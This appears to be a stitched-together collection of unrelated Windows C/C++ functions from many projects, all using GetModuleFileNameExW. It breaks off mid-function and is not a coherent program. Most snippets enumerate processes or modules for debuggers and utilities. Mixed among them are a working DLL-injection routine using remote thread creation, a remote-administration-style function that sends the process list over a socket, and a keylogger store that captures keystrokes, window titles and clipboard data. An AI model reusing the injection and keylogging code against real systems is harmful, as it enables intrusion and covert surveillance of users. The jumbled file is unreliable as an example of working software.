bool ProcessAccessHelp::getProcessModules(HANDLE hProcess, std::vector<ModuleInfo> &moduleList)
{
ModuleInfo module;
WCHAR filename[MAX_PATH*2] = {0};
DWORD cbNeeded = 0;
bool retVal = false;
DeviceNameResolver deviceNameResolver;
moduleList.reserve(20);
EnumProcessModules(hProcess, 0, 0, &cbNeeded);
HMODULE* hMods=(HMODULE*)malloc(cbNeeded*sizeof(HMODULE));
if (hMods)
{
if(EnumProcessModules(hProcess, hMods, cbNeeded, &cbNeeded))
{
for(unsigned int i = 1; i < (cbNeeded/sizeof(HMODULE)); i++) //skip first module!
{
module.modBaseAddr = (DWORD_PTR)hMods[i];
module.modBaseSize = (DWORD)getSizeOfImageProcess(hProcess, module.modBaseAddr);
module.isAlreadyParsed = false;
module.parsing = false;
filename[0] = 0;
module.fullPath[0] = 0;
if (GetMappedFileNameW(hProcess, (LPVOID)module.modBaseAddr, filename, _countof(filename)) > 0)
{
if (!deviceNameResolver.resolveDeviceLongNameToShort(filename, module.fullPath))
{
if (!GetModuleFileNameExW(hProcess, (HMODULE)module.modBaseAddr, module.fullPath, _countof(module.fullPath)))
{
wcscpy_s(module.fullPath, filename);
}
}
}
else
{
GetModuleFileNameExW(hProcess, (HMODULE)module.modBaseAddr, module.fullPath, _countof(module.fullPath));
}
moduleList.push_back(module);
}
retVal = true;
}
free(hMods);
}
return retVal;
}
static void fetch_module_name(void* name_addr, BOOL unicode, void* mod_addr,
WCHAR* buffer, size_t bufsz, BOOL is_pcs)
{
static WCHAR pcspid[] = {'P','r','o','c','e','s','s','_','%','0','8','x',0};
static WCHAR dlladdr[] = {'D','L','L','_','%','0','8','l','x',0};
memory_get_string_indirect(dbg_curr_process, name_addr, unicode, buffer, bufsz);
if (!buffer[0] &&
!GetModuleFileNameExW(dbg_curr_process->handle, mod_addr, buffer, bufsz))
{
if (is_pcs)
{
HMODULE h;
WORD (WINAPI *gpif)(HANDLE, LPWSTR, DWORD);
/* On Windows, when we get the process creation debug event for a process
* created by winedbg, the modules' list is not initialized yet. Hence,
* GetModuleFileNameExA (on the main module) will generate an error.
* Psapi (starting on XP) provides GetProcessImageFileName() which should
* give us the expected result
*/
if (!(h = GetModuleHandleA("psapi")) ||
!(gpif = (void*)GetProcAddress(h, "GetProcessImageFileNameW")) ||
!(gpif)(dbg_curr_process->handle, buffer, bufsz))
snprintfW(buffer, bufsz, pcspid, dbg_curr_pid);
}
else
snprintfW(buffer, bufsz, dlladdr, (unsigned long)mod_addr);
}
}
STDMETHODIMP CBProcess::get_FileName(BSTR* newVal)
{
CBString str;
DWORD dwLen;
//GetProcessImageFileName For Windows 5.1(XP 2003) later
DWORD (WINAPI *GetModuleFileNameExW)(HANDLE,HMODULE,LPWSTR,DWORD) = NULL;
HMODULE hmod = ::LoadLibrary("Psapi.dll");
if(hmod == NULL)
return HRESULT_FROM_WIN32(GetLastError());
GetModuleFileNameExW = (DWORD (WINAPI *)(HANDLE,HMODULE,LPWSTR,DWORD))GetProcAddress(hmod, "GetModuleFileNameExW");
if(GetModuleFileNameExW == NULL)
{
FreeLibrary(hmod);
return HRESULT_FROM_WIN32(GetLastError());
}
if (!(dwLen = GetModuleFileNameExW(m_hProcess, NULL, str.GetBufferSetLength(MAX_PATH), MAX_PATH)))
{
FreeLibrary(hmod);
str.ReleaseBuffer(0);
return HRESULT_FROM_WIN32(GetLastError());
}
FreeLibrary(hmod);
str.ReleaseBuffer(dwLen);
*newVal = str.AllocSysString();
return S_OK;
}
BOOL AudioVolume::IsQzoneMusicProcess(DWORD processId)
{
HANDLE hrocess = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ , FALSE, processId);
WCHAR fileName[MAX_PATH];
DWORD ret = GetModuleFileNameExW(hrocess, NULL, fileName, MAX_PATH);
BOOL bFind = (ret > 0 && wcsstr(fileName, L"QzoneMusic.exe") != NULL);
CloseHandle(hrocess);
return bFind;
}
ErrorCode Process::enumerateSharedLibraries(
std::function<void(SharedLibraryInfo const &)> const &cb) {
BOOL rc;
std::vector<HMODULE> modules;
DWORD bytesNeeded;
rc = EnumProcessModules(_handle, modules.data(),
modules.size() * sizeof(HMODULE), &bytesNeeded);
if (!rc)
return Platform::TranslateError();
modules.resize(bytesNeeded / sizeof(HMODULE));
rc = EnumProcessModules(_handle, modules.data(),
modules.size() * sizeof(HMODULE), &bytesNeeded);
if (!rc)
return Platform::TranslateError();
for (auto m : modules) {
SharedLibraryInfo sl;
sl.main = (m == modules[0]);
WCHAR nameStr[MAX_PATH];
DWORD nameSize;
nameSize = GetModuleFileNameExW(_handle, m, nameStr, sizeof(nameStr));
if (nameSize == 0)
return Platform::TranslateError();
sl.path = Platform::WideToNarrowString(std::wstring(nameStr, nameSize));
// The following two transforms ensure that the paths we return to the
// debugger look like unix paths. This shouldn't be required but LLDB seems
// to be having trouble with paths when the host and the remote don't use
// the same path separator.
if (sl.path.length() >= 2 && sl.path[0] >= 'A' && sl.path[0] <= 'Z' &&
sl.path[1] == ':')
sl.path.erase(0, 2);
for (auto &c : sl.path)
if (c == '\\')
c = '/';
// Modules on Windows only have one "section", which is the address of the
// module itself.
sl.sections.push_back(reinterpret_cast<uint64_t>(m));
cb(sl);
}
return kSuccess;
}
BOOL injection(DWORD pid, char *szDllName)
{
HANDLE hProc;
hProc = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);
if (hProc == NULL)
{
errorLOG("OpenProcess()");
return FALSE;
}
TCHAR szProcessName[MAX_PATH];
if (GetModuleFileNameExW(hProc, NULL, szProcessName, MAX_PATH) == 0)
{
errorLOG("GetModuleFileNameExW()");
return FALSE;
}
wprintf(L"path : %s\n", szProcessName);
LPVOID pRemoteBuf = NULL;
DWORD dwBufSize = strlen(szDllName) + sizeof(char);
pRemoteBuf = VirtualAllocEx(hProc, NULL, dwBufSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
if (pRemoteBuf == NULL)
{
errorLOG("VirtualAllocEx()");
return FALSE;
}
if (WriteProcessMemory(hProc, pRemoteBuf, (LPVOID)szDllName, dwBufSize, NULL) == FALSE)
{
errorLOG("WriteProcessMemory()");
return FALSE;
}
FARPROC pThreadProc = NULL;
pThreadProc = GetProcAddress(GetModuleHandle(L"kernel32.dll"), "LoadLibraryA");
if (pThreadProc == NULL)
{
errorLOG("GetProcAddress()");
return FALSE;
}
if (CreateRemoteThread(hProc, NULL, 0, (LPTHREAD_START_ROUTINE)pThreadProc, pRemoteBuf, 0, NULL) == NULL)
{
errorLOG("CreateRemoteThread()");
return FALSE;
}
return TRUE;
}
/// get the name of the process.
// @param full true if you want the full path; otherwise returns the base name.
// @function get_process_name
def get_process_name(Boolean full) {
HMODULE hMod;
DWORD cbNeeded;
wchar_t modname[MAX_PATH];
if (EnumProcessModules(this->hProcess, &hMod, sizeof(hMod), &cbNeeded)) {
if (full) {
GetModuleFileNameExW(this->hProcess, hMod, modname, sizeof(modname));
} else {
GetModuleBaseNameW(this->hProcess, hMod, modname, sizeof(modname));
}
return push_wstring(L,modname);
} else {
return push_error(L);
}
}
void CTask::SendTask(SOCKET sock)
{
MSGINFO_S msg;
TASK task;
memset(&msg, 0, sizeof(MSGINFO_S));
msg.Msg_id = TASKLIST;
DWORD needed;
HANDLE hProcess;
HMODULE hModule;
wchar_t path[260] = _T("");
HANDLE hToken;
HANDLE hProcessSnap = NULL;
PROCESSENTRY32 pe32;
pe32.dwSize = sizeof(PROCESSENTRY32);
hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
if (OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &hToken))
{
EnablePrivilege(hToken,SE_DEBUG_NAME); //尝试提升权限
Process32First(hProcessSnap, &pe32);
do
{
memset(&task, 0, sizeof(TASK));
memset(msg.context, 0, sizeof(msg.context));
hProcess = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, false, pe32.th32ProcessID);
if (hProcess)
{
EnumProcessModules(hProcess, &hModule, sizeof(hModule), &needed);
GetModuleFileNameExW(hProcess, hModule, path, sizeof(path));
wcscpy_s(task.TaskPath, _countof(path), path);
}
wcscpy_s(task.TaskName, _countof(pe32.szExeFile), pe32.szExeFile); //进程名
task.TaskID = pe32.th32ProcessID;
task.flag = false;
memcpy(msg.context, &task, sizeof(TASK));
m_sock.MySend(sock, (char*)&msg, sizeof(MSGINFO_S));
} while (Process32Next(hProcessSnap, &pe32));
}
CloseHandle(hProcess);
CloseHandle(hModule);
task.flag = true;
memcpy(msg.context, &task, sizeof(TASK));
m_sock.MySend(sock, (char*)&msg, sizeof(MSGINFO_S));
}
ULONG_PTR EngineGetProcAddressRemote(HANDLE hProcess, const wchar_t* szDLLName, const char* szAPIName)
{
if(!hProcess) //no process specified
{
if(!dbgProcessInformation.hProcess)
hProcess = GetCurrentProcess();
else
hProcess = dbgProcessInformation.hProcess;
}
DWORD cbNeeded = 0;
if(EnumProcessModules(hProcess, 0, 0, &cbNeeded))
{
HMODULE* hMods = (HMODULE*)malloc(cbNeeded * sizeof(HMODULE));
if(EnumProcessModules(hProcess, hMods, cbNeeded, &cbNeeded))
{
for(unsigned int i = 0; i < cbNeeded / sizeof(HMODULE); i++)
{
wchar_t szModuleName[MAX_PATH] = L"";
if(GetModuleFileNameExW(hProcess, hMods[i], szModuleName, _countof(szModuleName)))
{
wchar_t* dllName = wcsrchr(szModuleName, L'\\');
if(dllName)
{
dllName++;
if(!_wcsicmp(dllName, szDLLName))
{
HMODULE hModule = LoadLibraryExW(szModuleName, 0, DONT_RESOLVE_DLL_REFERENCES | LOAD_LIBRARY_AS_DATAFILE);
if(hModule)
{
ULONG_PTR funcAddress = (ULONG_PTR)GetProcAddress(hModule, szAPIName);
if(funcAddress)
{
funcAddress -= (ULONG_PTR)hModule; //rva
FreeLibrary(hModule);
return funcAddress + (ULONG_PTR)hMods[i]; //va
}
}
break;
}
}
}
}
}
free(hMods);
}
return 0;
}
bool ProcessLister::getAbsoluteFilePath(HANDLE hProcess, Process * process)
{
WCHAR processPath[MAX_PATH];
bool retVal = false;
wcscpy_s(process->fullPath, L"Unknown path");
if(!hProcess)
{
//missing rights
return false;
}
if (GetProcessImageFileNameW(hProcess, processPath, _countof(processPath)) > 0)
{
if (!deviceNameResolver->resolveDeviceLongNameToShort(processPath, process->fullPath))
{
#ifdef DEBUG_COMMENTS
Scylla::debugLog.log(L"getAbsoluteFilePath :: resolveDeviceLongNameToShort failed with path %s", processPath);
#endif
//some virtual volumes
MessageBoxW(0, processPath, L"Cannot resolve this path!", MB_ICONERROR);
}
else
{
retVal = true;
}
}
else
{
#ifdef DEBUG_COMMENTS
Scylla::debugLog.log(L"getAbsoluteFilePath :: GetProcessImageFileName failed %u", GetLastError());
#endif
if (GetModuleFileNameExW(hProcess, 0, process->fullPath, _countof(process->fullPath)) != 0)
{
retVal = true;
}
}
return retVal;
}
static bool WindowsGetModuleFileNameEx(HANDLE p_process, HMODULE p_module, MCStringRef& r_path)
{
bool t_success;
t_success = true;
// For some unfathomable reason, it is not possible find out how big a
// buffer you might need for a module file name. Instead we loop until
// we are sure we have the whole thing.
WCHAR *t_path;
uint32_t t_path_length;
t_path_length = 0;
t_path = nil;
while(t_success)
{
t_path_length += 256;
MCMemoryDeleteArray(t_path);
if (t_success)
t_success = MCMemoryNewArray(t_path_length, t_path);
DWORD t_result;
t_result = 0;
if (t_success)
{
// If the buffer is too small, the result will equal the input
// buffer size.
t_result = GetModuleFileNameExW(p_process, p_module, t_path, t_path_length);
if (t_result == 0)
t_success = false;
else if (t_result == t_path_length)
continue;
}
if (t_success)
break;
}
if (t_success)
t_success = MCStringCreateWithWString(t_path, r_path);
MCMemoryDeleteArray(t_path);
return t_success;
}
bool TerminateProcessFromPathFilename ( const SString& strPathFilename )
{
DWORD dwProcessIDs[250];
DWORD pBytesReturned = 0;
if ( EnumProcesses ( dwProcessIDs, 250 * sizeof(DWORD), &pBytesReturned ) )
{
DWORD id1 = GetCurrentProcessId();
for ( unsigned int i = 0; i < pBytesReturned / sizeof ( DWORD ); i++ )
{
DWORD id2 = dwProcessIDs[i];
if ( id2 == id1 )
continue;
// Skip 64 bit processes to avoid errors
if ( !Is32bitProcess ( dwProcessIDs[i] ) )
continue;
// Open the process
HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, 0, dwProcessIDs[i]);
if ( hProcess )
{
HMODULE pModule;
DWORD cbNeeded;
if ( EnumProcessModules ( hProcess, &pModule, sizeof ( HMODULE ), &cbNeeded ) )
{
WCHAR szModuleName[MAX_PATH*2] = L"";
if ( GetModuleFileNameExW( hProcess, pModule, szModuleName, NUMELMS(szModuleName) ) )
{
SString strModuleName = ToUTF8( szModuleName );
if ( stricmp ( strModuleName, strPathFilename ) == 0 )
{
TerminateProcess ( hProcess, 0 );
CloseHandle ( hProcess );
return true;
}
}
}
// Close the process
CloseHandle ( hProcess );
}
}
}
return false;
}
HANDLE GetProcessHandleFromName(LPWSTR procName){
// Assuming that the computer this runs on wont have more than 2048 processes.
DWORD dwProcessIds[2048];
DWORD dwProcessIdBytes;
EnumProcesses(dwProcessIds, sizeof(dwProcessIds), &dwProcessIdBytes);
// Now we look at each process.
for(DWORD i=0;i<dwProcessIdBytes/sizeof(DWORD);i++){
HANDLE proc = OpenProcess(PROCESS_INJECT_PERMISSIONS, FALSE, dwProcessIds[i]);
// We probably don't have permissions to mess with it.
if(proc == INVALID_HANDLE_VALUE){
continue;
}
// Lets get the name of the process.
WCHAR procQueryName[MAX_PATH];
WCHAR *procFileName;
GetModuleFileNameExW(proc, 0, procQueryName, MAX_PATH);
// No idea what these processes are, maybe something to do with x64 processes hiding from x86 processes??
if(wcslen(procQueryName) == 284 || wcslen(procQueryName) == 285){
continue;
}
procFileName = GetFileName(procQueryName);
if(wcscmp(procFileName, procName) == 0){
// Break if the name matches the one we are searching for.
return proc;
} else {
// Otherwise close the handle.
CloseHandle(proc);
}
}
return NULL;
}
BOOL CALLBACK enumWindowsProc(HWND hWnd, LPARAM lParam)
{
WCHAR buffer[1024] = { L"\0" };
INT32 len = GetWindowTextW(hWnd, buffer, ARRAYSIZE(buffer));
if (!len ||
(std::wstring(buffer) == _Nena_Ignore_DefaultImeW) ||
(std::wstring(buffer) == _Nena_Ignore_MsctfimeW))
return TRUE;
std::string bufferconv;
std::wstring bufferwconv = buffer;
Nena::Converter::String16To8(bufferconv, bufferwconv);
g_windows[hWnd] = bufferconv;
GetClassNameW(hWnd, buffer, ARRAYSIZE(buffer));
bufferwconv = buffer;
Nena::Converter::String16To8(bufferconv, bufferwconv);
g_classes[hWnd] = bufferconv;
DWORD processId;
GetWindowThreadProcessId(hWnd, &processId);
HANDLE processHandle = OpenProcess(PROCESS_QUERY_LIMITED_INFORMATION | PROCESS_VM_READ, FALSE, processId);
if (processHandle)
{
BOOL ok;
DWORD size;
size = GetModuleFileNameExW(processHandle, NULL, buffer, ARRAYSIZE(buffer));
bufferwconv = buffer;
Nena::Converter::String16To8(bufferconv, bufferwconv);
g_images[hWnd] = bufferconv;
}
CloseHandle(processHandle);
return TRUE;
}
ULONG_PTR EngineGetAddressLocal(HANDLE hProcess, ULONG_PTR Address)
{
HMODULE remoteModuleBase = (HMODULE)EngineGetModuleBaseRemote(hProcess, Address);
if(remoteModuleBase)
{
wchar_t szModuleName[MAX_PATH] = L"";
if(GetModuleFileNameExW(hProcess, remoteModuleBase, szModuleName, _countof(szModuleName)))
{
wchar_t* dllName = wcsrchr(szModuleName, L'\\');
if(dllName)
{
dllName++;
ULONG_PTR localModuleBase = EngineGetModuleBaseRemote(GetCurrentProcess(), dllName);
if(localModuleBase)
{
Address -= (ULONG_PTR)remoteModuleBase; //rva
return Address + localModuleBase;
}
}
}
}
return 0;
}
DWORD
WINAPI
GetModuleFileNameExA(
HANDLE hProcess,
HMODULE hModule,
LPSTR lpFilename,
DWORD nSize
)
{
LPWSTR lpwstr;
DWORD cwch;
DWORD cch;
lpwstr = (LPWSTR) LocalAlloc(LMEM_FIXED, nSize * 2);
if (lpwstr == NULL) {
return(0);
}
cwch = cch = GetModuleFileNameExW(hProcess, hModule, lpwstr, nSize);
if (cwch < nSize) {
//
// Include NULL terminator
//
cwch++;
}
if (!WideCharToMultiByte(CP_ACP, 0, lpwstr, cwch, lpFilename, nSize, NULL, NULL)) {
cch = 0;
}
LocalFree((HLOCAL) lpwstr);
return(cch);
}
/******************************************************************
* add_module
*
* Add a module to a dump context
*/
static BOOL add_module(struct dump_context* dc, const WCHAR* name,
DWORD64 base, DWORD size, DWORD timestamp, DWORD checksum,
BOOL is_elf)
{
if (!dc->modules)
{
dc->alloc_modules = 32;
dc->modules = HeapAlloc(GetProcessHeap(), 0,
dc->alloc_modules * sizeof(*dc->modules));
}
else if(dc->num_modules >= dc->alloc_modules)
{
dc->alloc_modules *= 2;
dc->modules = HeapReAlloc(GetProcessHeap(), 0, dc->modules,
dc->alloc_modules * sizeof(*dc->modules));
}
if (!dc->modules)
{
dc->alloc_modules = dc->num_modules = 0;
return FALSE;
}
if (is_elf ||
!GetModuleFileNameExW(dc->hProcess, (HMODULE)(DWORD_PTR)base,
dc->modules[dc->num_modules].name,
sizeof(dc->modules[dc->num_modules].name) / sizeof(WCHAR)))
lstrcpynW(dc->modules[dc->num_modules].name, name,
sizeof(dc->modules[dc->num_modules].name) / sizeof(WCHAR));
dc->modules[dc->num_modules].base = base;
dc->modules[dc->num_modules].size = size;
dc->modules[dc->num_modules].timestamp = timestamp;
dc->modules[dc->num_modules].checksum = checksum;
dc->modules[dc->num_modules].is_elf = is_elf;
dc->num_modules++;
return TRUE;
}
ULONG_PTR EngineGetModuleBaseRemote(HANDLE hProcess, const wchar_t* szDLLName)
{
if(!hProcess) //no process specified
{
if(!dbgProcessInformation.hProcess)
hProcess = GetCurrentProcess();
else
hProcess = dbgProcessInformation.hProcess;
}
DWORD cbNeeded = 0;
if(EnumProcessModules(hProcess, 0, 0, &cbNeeded))
{
HMODULE* hMods = (HMODULE*)malloc(cbNeeded * sizeof(HMODULE));
if(EnumProcessModules(hProcess, hMods, cbNeeded, &cbNeeded))
{
for(unsigned int i = 0; i < cbNeeded / sizeof(HMODULE); i++)
{
wchar_t szModuleName[MAX_PATH] = L"";
if(GetModuleFileNameExW(hProcess, hMods[i], szModuleName, _countof(szModuleName)))
{
wchar_t* dllName = wcsrchr(szModuleName, L'\\');
if(dllName)
{
dllName++;
if(!_wcsicmp(dllName, szDLLName))
{
return (ULONG_PTR)hMods[i];
}
}
}
}
}
free(hMods);
}
return 0;
}
void DumpMemoryGui::getMemoryList()
{
DWORD_PTR address = 0;
MEMORY_BASIC_INFORMATION memBasic = {0};
Memory memory;
HMODULE * hMods = 0;
WCHAR target[MAX_PATH];
if (memoryList.empty())
{
memoryList.reserve(20);
}
else
{
memoryList.clear();
}
memory.filename[0] = 0;
memory.peSection[0] = 0;
memory.mappedFilename[0] = 0;
while(VirtualQueryEx(ProcessAccessHelp::hProcess,(LPCVOID)address,&memBasic,sizeof(memBasic)))
{
memory.address = (DWORD_PTR)memBasic.BaseAddress;
memory.type = memBasic.Type;
memory.state = memBasic.State;
memory.size = (DWORD)memBasic.RegionSize;
memory.protect = memBasic.Protect;
if (memory.type == MEM_MAPPED)
{
if (!getMappedFilename(&memory))
{
memory.mappedFilename[0] = 0;
}
}
memoryList.push_back(memory);
memory.mappedFilename[0] = 0;
address += memBasic.RegionSize;
}
DWORD numHandles = ProcessAccessHelp::getModuleHandlesFromProcess(ProcessAccessHelp::hProcess, &hMods);
if (numHandles == 0)
{
return;
}
for (DWORD i = 0; i < numHandles; i++)
{
if (GetModuleFileNameExW(ProcessAccessHelp::hProcess, hMods[i], target, _countof(target)))
{
setModuleName((DWORD_PTR)hMods[i],target);
setAllSectionNames((DWORD_PTR)hMods[i],target);
}
else
{
#ifdef DEBUG_COMMENTS
Scylla::debugLog.log(L"getMemoryList :: GetModuleFileNameExW failed 0x%X", GetLastError());
#endif
}
}
delete [] hMods;
}
void SymDownloadAllSymbols(const char* SymbolStore)
{
// Default to Microsoft's symbol server
if(!SymbolStore)
SymbolStore = "http://msdl.microsoft.com/download/symbols";
// Build the vector of modules
std::vector<SYMBOLMODULEINFO> modList;
if(!SymGetModuleList(&modList))
return;
// Skip loading if there aren't any found modules
if(modList.size() <= 0)
return;
// Backup the current symbol search path
char oldSearchPath[MAX_PATH];
if(!SafeSymGetSearchPath(fdProcessInfo->hProcess, oldSearchPath, MAX_PATH))
{
dputs("SymGetSearchPath failed!");
return;
}
// Use the custom server path and directory
char customSearchPath[MAX_PATH * 2];
sprintf_s(customSearchPath, "SRV*%s*%s", szSymbolCachePath, SymbolStore);
if(!SafeSymSetSearchPath(fdProcessInfo->hProcess, customSearchPath))
{
dputs("SymSetSearchPath (1) failed!");
return;
}
// Reload
for(auto & module : modList)
{
dprintf("Downloading symbols for %s...\n", module.name);
wchar_t modulePath[MAX_PATH];
if(!GetModuleFileNameExW(fdProcessInfo->hProcess, (HMODULE)module.base, modulePath, MAX_PATH))
{
dprintf("GetModuleFileNameExW("fhex") failed!\n", module.base);
continue;
}
if(!SafeSymUnloadModule64(fdProcessInfo->hProcess, (DWORD64)module.base))
{
dprintf("SymUnloadModule64("fhex") failed!\n", module.base);
continue;
}
if(!SafeSymLoadModuleEx(fdProcessInfo->hProcess, 0, StringUtils::Utf16ToUtf8(modulePath).c_str(), 0, (DWORD64)module.base, 0, 0, 0))
{
dprintf("SymLoadModuleEx("fhex") failed!\n", module.base);
continue;
}
}
// Restore the old search path
if(!SafeSymSetSearchPath(fdProcessInfo->hProcess, oldSearchPath))
dputs("SymSetSearchPath (2) failed!");
}
/* _al_win_get_path:
* Returns full path to various system and user diretories
*/
ALLEGRO_PATH *_al_win_get_path(int id)
{
char path[MAX_PATH];
wchar_t pathw[MAX_PATH];
ALLEGRO_USTR *pathu;
uint32_t csidl = 0;
HRESULT ret = 0;
ALLEGRO_PATH *cisdl_path = NULL;
switch (id) {
case ALLEGRO_TEMP_PATH: {
/* Check: TMP, TMPDIR, TEMP or TEMPDIR */
DWORD ret = GetTempPathW(MAX_PATH, pathw);
if (ret > MAX_PATH) {
/* should this ever happen, windows is more broken than I ever thought */
return NULL;
}
pathu = al_ustr_new_from_utf16(pathw);
al_ustr_to_buffer(pathu, path, sizeof path);
al_ustr_free(pathu);
return al_create_path_for_directory(path);
}
break;
case ALLEGRO_RESOURCES_PATH: { /* where the program is in */
HANDLE process = GetCurrentProcess();
char *ptr;
GetModuleFileNameExW(process, NULL, pathw, MAX_PATH);
pathu = al_ustr_new_from_utf16(pathw);
al_ustr_to_buffer(pathu, path, sizeof path);
al_ustr_free(pathu);
ptr = strrchr(path, '\\');
if (!ptr) { /* shouldn't happen */
return NULL;
}
/* chop off everything including and after the last slash */
/* should this not chop the slash? */
*ptr = '\0';
return al_create_path_for_directory(path);
}
break;
case ALLEGRO_USER_DATA_PATH: /* CSIDL_APPDATA */
case ALLEGRO_USER_SETTINGS_PATH:
csidl = CSIDL_APPDATA;
break;
case ALLEGRO_USER_HOME_PATH: /* CSIDL_PROFILE */
csidl = CSIDL_PROFILE;
break;
case ALLEGRO_USER_DOCUMENTS_PATH: /* CSIDL_PERSONAL */
csidl = CSIDL_PERSONAL;
break;
case ALLEGRO_EXENAME_PATH: { /* full path to the exe including its name */
HANDLE process = GetCurrentProcess();
GetModuleFileNameExW(process, NULL, pathw, MAX_PATH);
pathu = al_ustr_new_from_utf16(pathw);
al_ustr_to_buffer(pathu, path, sizeof path);
al_ustr_free(pathu);
return al_create_path(path);
}
break;
default:
return NULL;
}
ret = SHGetFolderPathW(NULL, csidl, NULL, SHGFP_TYPE_CURRENT, pathw);
if (ret != S_OK) {
return NULL;
}
pathu = al_ustr_new_from_utf16(pathw);
al_ustr_to_buffer(pathu, path, sizeof path);
al_ustr_free(pathu);
cisdl_path = al_create_path_for_directory(path);
if (!cisdl_path)
return NULL;
if (csidl == CSIDL_APPDATA) {
const char *org_name = al_get_org_name();
const char *app_name = al_get_app_name();
if (!app_name || !app_name[0]) {
/* this shouldn't ever happen. */
al_destroy_path(cisdl_path);
return NULL;
}
if (org_name && org_name[0]) {
al_append_path_component(cisdl_path, org_name);
}
al_append_path_component(cisdl_path, app_name);
}
return cisdl_path;
}
//
// Adds a new pressed key information into the key store.
//
WINERROR KeyStoreAdd(
PKEY_INFO pKeyInfo
)
{
WINERROR Status = ERROR_NOT_ENOUGH_MEMORY;
ULONG KeyHandle;
PKEY_CONTEXT Ctx;
BOOL bDeref = FALSE;
KeyHandle = Crc32((PCHAR)&pKeyInfo->Client, sizeof(CLIENT_INFO));
if (Ctx = GetContext(KeyHandle))
{
bDeref = Ctx->bDirty;
if (Ctx->bDirty == FALSE) // just created
{
// Context has just been created, initializing
HANDLE hProcess;
// Resolving process path
if (hProcess = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, FALSE, pKeyInfo->Client.ProcessId))
{
GetModuleFileNameExW(hProcess, NULL, (LPWSTR)&Ctx->ProcessPath, MAX_PATH);
CloseHandle(hProcess);
}
Ctx->bActive = TRUE;
// Saving current date and time
GetSystemTimeAsFileTime(&Ctx->Time);
// Resolving parent window text
GetWindowTextW(pKeyInfo->Client.ParentWindow, (LPWSTR)&Ctx->WindowText, MAX_WINDOW_TEXT);
} // if (Ctx->bDirty == FALSE) // just created
Ctx->bDirty = TRUE;
if (Ctx->bActive)
{
if (pKeyInfo->wChar && Ctx->Count < MAX_KEY_BUFFER_SIZE)
{
if (pKeyInfo->wChar == VK_BACK)
{
if (Ctx->Count)
Ctx->Count -= 1;
}
else
{
Ctx->KeyBuffer[Ctx->Count] = pKeyInfo->wChar;
Ctx->Count += 1;
DbgPrint("KEYLOG: Adding key to a buffer: 0x%x, %C\n", pKeyInfo->wChar, pKeyInfo->wChar);
}
Status = NO_ERROR;
} // if (Ctx->Count < MAX_KEY_BUFFER_SIZE)
else
Status = ERROR_BUFFER_OVERFLOW;
if ( pKeyInfo->clipboard )
{
PCLIPBOARD_ENTRY Entry = (PCLIPBOARD_ENTRY)AppAlloc( sizeof(CLIPBOARD_ENTRY) );
if ( Entry )
{
// Saving current date and time
GetSystemTimeAsFileTime(&Entry->Time);
Entry->Buffer = pKeyInfo->clipboard;
pKeyInfo->clipboard = NULL; // we'll free it later
InsertTailList(&Ctx->ClipboardChain,&Entry->qLink);
}
} // if ( pKeyInfo->clipboard )
} // if (Ctx->bActive)
if ( bDeref )
// Context has been reused, dereferencing it
ReleaseContext(Ctx);
} // if (Ctx = GetContext(KeyHandle))
return(Status);
}
int PatchFile(const PATCHINFO* List, int Count, const char* FileName, char* Error)
{
//
// This function returns an int based on the number
// of patches applied. -1 indicates a failure.
//
if(Count <= 0)
{
// Notify the user of the error
if(Error)
strcpy_s(Error, MAX_ERROR_SIZE, "No patches to apply");
return -1;
}
// Get a copy of the first module name in the array
char moduleName[MAX_MODULE_SIZE];
strcpy_s(moduleName, List[0].mod);
// Check if all patches are in the same module
for(int i = 0; i < Count; i++)
{
if(_stricmp(List[i].mod, moduleName))
{
if(Error)
sprintf_s(Error, MAX_ERROR_SIZE, "Not all patches are in module %s", moduleName);
return -1;
}
}
// See if the module was loaded
duint moduleBase = ModBaseFromName(moduleName);
if(!moduleBase)
{
if(Error)
sprintf_s(Error, MAX_ERROR_SIZE, "Failed to get base of module %s", moduleName);
return -1;
}
// Get the unicode version of the module's path
wchar_t originalName[MAX_PATH];
if(!GetModuleFileNameExW(fdProcessInfo->hProcess, (HMODULE)moduleBase, originalName, ARRAYSIZE(originalName)))
{
if(Error)
sprintf_s(Error, MAX_ERROR_SIZE, "Failed to get module path of module %s", moduleName);
return -1;
}
// Create a temporary backup file
if(!CopyFileW(originalName, StringUtils::Utf8ToUtf16(FileName).c_str(), false))
{
if(Error)
strcpy_s(Error, MAX_ERROR_SIZE, "Failed to make a copy of the original file (patch target is in use?)");
return -1;
}
HANDLE fileHandle;
DWORD loadedSize;
HANDLE fileMap;
ULONG_PTR fileMapVa;
if(!StaticFileLoadW(StringUtils::Utf8ToUtf16(FileName).c_str(), UE_ACCESS_ALL, false, &fileHandle, &loadedSize, &fileMap, &fileMapVa))
{
strcpy_s(Error, MAX_ERROR_SIZE, "StaticFileLoad failed");
return -1;
}
// Begin iterating all patches, applying them to a file
int patchCount = 0;
for(int i = 0; i < Count; i++)
{
// Convert the virtual address to an offset within disk file data
unsigned char* ptr = (unsigned char*)ConvertVAtoFileOffsetEx(fileMapVa, loadedSize, moduleBase, List[i].addr, false, true);
// Skip patches that do not have a raw address
if(!ptr)
continue;
*ptr = List[i].newbyte;
patchCount++;
}
// Unload the file from memory and commit changes to disk
if(!StaticFileUnloadW(StringUtils::Utf8ToUtf16(FileName).c_str(), true, fileHandle, loadedSize, fileMap, fileMapVa))
{
if(Error)
strcpy_s(Error, MAX_ERROR_SIZE, "StaticFileUnload failed");
return -1;
}
// Zero the error message and return count
if(Error)
memset(Error, 0, MAX_ERROR_SIZE * sizeof(char));
return patchCount;
}
static gboolean get_process_cmdline(gint p_pid, gchar **p_exe, gchar **p_cmd_line)
{
#ifdef DEBUG_VERBOSE
purple_debug_info("gfire", "trace: get_process_cmdline(%d)\n", p_pid);
#endif // DEBUG_VERBOSE
HANDLE process;
PVOID peb;
PVOID rtlUserProcParamsAddress;
UNICODE_STRING cmdline;
WCHAR *cmdline_buff;
*p_exe = *p_cmd_line = NULL;
if((process = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, FALSE, p_pid)) == 0)
{
// Don't handle missing permissions as an error
if(GetLastError() != ERROR_ACCESS_DENIED)
{
gchar tmpError[1024];
